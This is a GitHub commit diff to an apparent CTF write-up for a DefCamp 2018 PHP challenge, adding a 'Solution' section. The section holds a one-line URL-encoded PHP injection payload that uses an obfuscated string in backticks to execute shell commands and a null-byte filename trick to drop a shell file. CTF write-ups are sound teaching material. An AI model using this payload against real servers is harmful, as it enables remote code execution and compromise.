Skip to content

Commit ab2b94e

Browse files
committed
Updates php/challenge-97.md
Auto commit by GitBook Editor
1 parent 9b37ee1 commit ab2b94e

File tree

1 file changed

+7
-1
lines changed

1 file changed

+7
-1
lines changed

php/challenge-97.md

Lines changed: 7 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -76,7 +76,13 @@ define('FLAG', 'DCTF{7b39c8fcaef42b2f72d1f7d6f0686802bd9282f289f125281fd92c67572
7676
// added afterwards, not part of the challenge and keeps crashing apache because of a scenario
7777
$_SERVER['REQUEST_URI'] = '/';
7878
```
79-
#
79+
# Solution
80+
getshell:
81+
```
82+
data=<?=$_=~%9c%9e%8b;`$_ ../*>_`;%26name%3Dz.php%00
83+
```
84+
85+
8086
# Refference
8187
+ DefCamp CTF Finals 2018
8288
+ https://github.com/w181496/CTF/tree/master/dctf2018-final/Scribbles

0 commit comments

Comments
 (0)